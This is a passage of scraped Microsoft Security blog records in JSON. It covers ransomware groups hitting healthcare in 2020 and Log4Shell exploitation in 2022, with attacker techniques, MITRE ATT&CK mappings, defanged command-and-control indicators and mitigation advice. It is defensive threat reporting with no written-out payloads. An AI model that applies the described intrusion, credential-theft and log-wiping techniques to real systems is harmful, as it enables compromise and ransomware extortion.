passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&amp;CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T21:27:16", "description": "**_January 10, 2022 recap \u2013_**_ The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers\u2019 software and services. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment. Customers are encouraged to utilize scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities._\n\n_In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware._ _We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance._\n\n_**January 19, 2022 update** - We added new information about an unrelated vulnerability we discovered while investigating Log4j attacks._\n\nThe remote code execution (RCE) vulnerabilities in Apache Log4j 2 referred to as \u201cLog4Shell\u201d ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>)) has presented a new attack vector and gained broad attention due to its severity and potential for widespread exploitation. The majority of attacks we have observed so far have been mainly mass-scanning, coin mining, establishing remote shells, and red-team activity, but it\u2019s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits.\n\nWith nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>) for technical information about the vulnerabilities and mitigation recommendations.\n\nMeanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats. This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks.\n\nThis blog covers the following topics:\n\n 1. **Attack vectors and observed activity**\n 2. **Finding and remediating vulnerable apps and systems**\n * Threat and vulnerability management\n * Discovering affected components, software, and devices via a unified Log4j dashboard\n * Applying mitigation directly in the Microsoft 365 Defender portal\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for servers\n * Microsoft Defender for Containers\n * Microsoft Sentinel queries\n * RiskIQ EASM and Threat Intelligence\n 3. **Detecting and responding to exploitation attempts and other related attacker activity**\n * Microsoft 365 Defender\n * Microsoft Defender Antivirus\n * Microsoft Defender for Endpoint\n * Microsoft Defender for Cloud Apps\n * Microsoft Defender for Office 365\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for IoT\n * Microsoft Sentinel\n * Microsoft Sentinel queries\n * Azure Firewall Premium\n * Azure Web Application Firewall (WAF)\n 4. **Indicators of compromise (IoCs)**\n\n## Attack vectors and observed activity\n\nMicrosoft\u2019s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of the remote code execution (RCE) vulnerabilities in [Apache Log4j 2](<https://logging.apache.org/log4j/2.x/>) referred to as \u201cLog4Shell\u201d.\n\nThe bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:\n\n\n\nAn attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.\n\nThe specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as \u201cldap\u201d, \u201cldaps\u201d, \u201crmi\u201d, \u201cdns\u201d, \u201ciiop\u201d, or \u201chttp\u201d, precedes the attacker domain.\n\nAs security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. We\u2019ve seen things like running a lower or upper command within the exploitation string and even more complicated obfuscation attempts, such as the following, that are all trying to bypass string-matching detections:\n\n\n\nThe vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.\n\n### Exploitation continues on non-Microsoft hosted Minecraft servers\n\nMinecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. More information can be found here: <https://aka.ms/mclog>.\n\nMicrosoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader.\n\nIn these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.\n\nWhile it\u2019s uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials. These techniques are typically associated with enterprise compromises with the intent of lateral movement. Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use.\n\nDue to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.\n\n### Nation-state activity\n\nMSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerabilities to in-the-wild payload deployment, and exploitation against targets to achieve the actor\u2019s objectives.\n\nFor example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.\n\nIn addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.\n\n### Access brokers associated with ransomware\n\nMSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.\n\n### Mass scanning activity continues\n\nThe vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows.\n\nMicrosoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.\n\n### Additional RAT payloads\n\nWe\u2019ve observed the dropping of additional remote access toolkits and reverse shells via exploitation of CVE-2021-44228, which actors then use for hands-on-keyboard attacks. In addition to the Cobalt Strike and PowerShell reverse shells seen in earlier reports, we\u2019ve also seen Meterpreter, Bladabindi, and HabitsRAT. Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally.\n\nThis activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE-2021-44428 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns.\n\n### Webtoos\n\nThe Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities. As reported by [RiskIQ](<https://community.riskiq.com/article/67ba1386>), Microsoft has seen Webtoos being deployed via the vulnerability. Attackers\u2019 use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability.\n\n### A note on testing services and assumed benign activity\n\nWhile services such as _interact.sh_, _canarytokens.org_, _burpsuite_, and _dnslog.cn_ may be used by IT organizations to profile their own threat footprints, Microsoft encourages including these services in your hunting queries and validating observations of these in environments to ensure they are intentional and legitimate activity.\n\n### Exploitation in internet-facing systems leads to ransomware\n\nAs early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.\n\nThese attacks are performed by a China-based ransomware operator that we\u2019re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).\n\nBased on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.\n\n### Attackers propagating Log4j attacks via previously undisclosed vulnerability\n\nDuring our sustained monitoring of threats taking advantage of the Log4j 2 vulnerabilities, we observed activity related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. We discovered that the vulnerability, now tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.\n\nWe reported our discovery to SolarWinds, and we\u2019d like to thank their teams for immediately investigating and working to remediate the vulnerability. We strongly recommend affected customers to apply security updates released by referring to the SolarWinds advisory here: <https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>. \n\nMicrosoft customers can use threat and vulnerability management in Microsoft Defender for Endpoint to identify and remediate devices that have this vulnerability. In addition, Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malicious behavior related to the observed activity.\n\n## Finding and remediating vulnerable apps and systems\n\n### Threat and vulnerability management\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in Microsoft Defender for Endpoint monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities.\n\n#### Discovering affected components, software, and devices via a unified Log4j dashboard\n\nThreat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.\n\nThe wide use of Log4j across many supplier\u2019s products challenge defender teams to mitigate and address the risks posed by the 